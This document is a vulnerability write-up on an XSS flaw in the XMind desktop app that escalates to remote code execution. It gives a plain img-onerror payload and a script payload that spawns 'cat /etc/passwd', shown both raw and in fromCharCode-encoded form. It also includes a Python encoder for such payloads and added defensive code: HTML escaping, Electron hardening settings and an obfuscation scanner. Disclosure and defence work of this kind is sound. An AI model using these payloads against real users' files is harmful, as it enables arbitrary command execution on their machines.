0x00 Vulnerability Overview

Entering a payload in xmind triggers XSS, and by modifying the payload the XSS can be escalated to RCE. The vulnerable xmind is not tied to a user platform (the vulnerability can be reproduced on Windows, Linux and macOS).

0x01 Reproduction - XSS

  • Taking Linux as the example (macOS and Windows reproduce the same way): first download xmind, then open it and create a new file from any template

  • Change the text of the central topic to an XSS payload, for example <img src=x onerror=alert(1)>

  • Click Outline to switch to the outline view

  • At this point no XSS alert appears yet, because triggering it takes one more small step, shown below

[screenshot: the extra step]

  • xmind now triggers the XSS

0x02 Reproduction - XSS to RCE

  • So far we have only popped an XSS alert; next we show how to go from XSS to RCE. Simply replace the earlier XSS payload in xmind with the encoded payload below:

    Payload before encoding:
    #Decode Payload
    <script>
    const { spawn } = require("child_process");
    const cat = spawn("cat", ["/etc/passwd"]);
    cat.stdout.on("data", data => {
        alert(`stdout: ${data}`);
    });</script>

    Payload after encoding:
    #Encode Payload
    <img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,99,111,110,115,116,32,123,32,115,112,97,119,110,32,125,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,59,10,99,111,110,115,116,32,99,97,116,32,61,32,115,112,97,119,110,40,34,99,97,116,34,44,32,91,34,47,101,116,99,47,112,97,115,115,119,100,34,93,41,59,10,99,97,116,46,115,116,100,111,117,116,46,111,110,40,34,100,97,116,97,34,44,32,100,97,116,97,32,61,62,32,123,10,32,32,32,32,97,108,101,114,116,40,96,115,116,100,111,117,116,58,32,36,123,100,97,116,97,125,96,41,59,10,125,41,59,60,47,115,99,114,105,112,116,62))>
  • With the same trigger steps, xmind pops up the contents of /etc/passwd

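The XSS in 0x01 exists because topic text reaches the outline view as markup, and the escalation in 0x02 works because script running in that view can call require("child_process"). The following is an added example, not XMind's code and not from the original post: a hypothetical outline renderer in its vulnerable and escaped forms, plus the two Electron webPreferences options that decide whether a renderer-side XSS can reach Node at all. The option names (nodeIntegration, contextIsolation) are real Electron options; the page does not say which values XMind uses, so the objects below are illustrative.

```javascript
// Added example, not XMind's code. renderOutlineItemUnsafe / renderOutlineItemSafe
// are hypothetical renderers standing in for however the outline view builds its
// list items; the page does not show XMind's real implementation.

// Vulnerable form: the topic title is spliced into markup as-is, so a title of
// "<img src=x onerror=alert(1)>" becomes live HTML when the string is rendered.
function renderOutlineItemUnsafe(title) {
  return `<li class="topic">${title}</li>`;
}

// HTML-entity encode the characters that can open a tag, close one, or break out
// of a quoted attribute. This is the standard escaping for text-in-element context.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, ch => map[ch]);
}

// Hardened form: identical markup, but the title is data, never structure.
// In a live DOM the equivalent is assigning element.textContent instead of innerHTML.
function renderOutlineItemSafe(title) {
  return `<li class="topic">${escapeHtml(title)}</li>`;
}

// Electron renderer settings (real option names; the values are illustrative, the
// page does not state XMind's). With nodeIntegration on and contextIsolation off,
// an injected <script> can require("child_process"), which is exactly the step
// that turns the XSS into RCE. The hardened pair leaves page script with no
// route to Node, so the same XSS stays a UI-level bug.
const weakWebPreferences = { nodeIntegration: true, contextIsolation: false };
const hardenedWebPreferences = { nodeIntegration: false, contextIsolation: true };

// Simplified rule: page script gets a Node require() only when node integration
// is enabled and the page is not isolated from the preload/Node world.
function rendererCanReachNode(prefs) {
  return prefs.nodeIntegration === true && prefs.contextIsolation !== true;
}

// Self-check with the page's XSS payload as the topic text.
const payload = '<img src=x onerror=alert(1)>';
console.log(renderOutlineItemUnsafe(payload)); // contains a live <img onerror=...>
console.log(renderOutlineItemSafe(payload));   // &lt;img src=x onerror=alert(1)&gt;
console.log(rendererCanReachNode(weakWebPreferences), rendererCanReachNode(hardenedWebPreferences));
```

Escaping (or using textContent) fixes the XSS on its own; disabling nodeIntegration and enabling contextIsolation is the defence-in-depth layer that would have kept an unescaped title from becoming a process launch.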
0x03 Script to generate the encoded payload (py)

# Build the <img onerror> form of a <script> block by emitting every character
# as its decimal code point for String.fromCharCode().
decode_str = '''<script>
const { spawn } = require("child_process");
const cat = spawn("ls", ["/home"]);
cat.stdout.on("data", data => {
alert(`stdout: ${data}`);
});</script>'''
encode_str = "<img src=x onerror=writeln(String.fromCharCode("

# Append the code of each character, comma-separated.
for letter in decode_str:
    encode_str = encode_str + str(ord(letter)) + ","

# Drop the trailing comma, then close the call and the tag.
encode_str = encode_str.strip(",") + "))>"
print(encode_str)
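The script above is the encoder; the matching defensive step is to run the decoder over topic text before anything renders it, so that the obfuscated 0x02 payload is judged by what it decodes to rather than by its surface form. The scanner below is an added example, not code from the post or from XMind: decodeFromCharCode, scanTopicText and scanTopics are my own names, the marker list is my own choice, and the sample topics are constructed.

```javascript
// Added example, not part of the original post: undo the String.fromCharCode()
// obfuscation used in 0x02/0x03 and look for markup and Node API references in
// both the raw and the decoded topic text. Names and samples are mine.

// Matches one String.fromCharCode(n1, n2, ...) call with a purely numeric argument list.
const FROM_CHAR_CODE = /String\.fromCharCode\(\s*([0-9,\s]+)\)/;

// Replace every String.fromCharCode(...) call in the text with the string it builds.
function decodeFromCharCode(text) {
  return text.replace(new RegExp(FROM_CHAR_CODE.source, 'g'), (_, codes) => {
    const nums = codes.split(',').map(s => s.trim()).filter(s => s !== '').map(Number);
    return String.fromCharCode(...nums);
  });
}

// Indicators a topic title should never contain; checked on raw and decoded text.
const MARKERS = [
  { name: 'html-tag',              re: /<\s*(script|img|svg|iframe|object|embed)\b/i },
  { name: 'event-handler',         re: /\bon[a-z]+\s*=/i },
  { name: 'node-require',          re: /\brequire\s*\(\s*["']child_process["']/ },
  { name: 'char-code-obfuscation', re: FROM_CHAR_CODE },
];

// Scan one topic title; returns the markers hit and the de-obfuscated text so an
// analyst can read what the payload actually does.
function scanTopicText(text) {
  const decoded = decodeFromCharCode(text);
  const findings = MARKERS
    .filter(m => m.re.test(text) || m.re.test(decoded))
    .map(m => m.name);
  return { findings, decoded };
}

// Scan a list of {id, title} topics (the shape a content.json walker would hand
// over; unzipping the .xmind file itself is out of scope here) and keep only the
// flagged ones.
function scanTopics(topics) {
  return topics
    .map(t => ({ id: t.id, ...scanTopicText(t.title) }))
    .filter(r => r.findings.length > 0);
}

// Constructed samples: a normal title, the plain XSS from 0x01, and a
// fromCharCode-wrapped title that decodes to an inert marker string.
const obfuscated = '<img src=x onerror=writeln(String.fromCharCode(' +
  [...'<script>require("child_process")</script>'].map(c => c.charCodeAt(0)).join(',') +
  '))>';
const SAMPLE_TOPICS = [
  { id: 't1', title: 'Quarterly roadmap' },
  { id: 't2', title: '<img src=x onerror=alert(1)>' },
  { id: 't3', title: obfuscated },
];

console.log(JSON.stringify(scanTopics(SAMPLE_TOPICS), null, 2));
```

Because the decoded text is checked as well as the raw text, the obfuscated title is flagged for the same reasons as the plain one, plus the node-require marker that only becomes visible after decoding and the presence of the obfuscation itself. Feeding real titles from a .xmind archive to scanTopics is a matter of unzipping it and walking its content file.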

0x04 References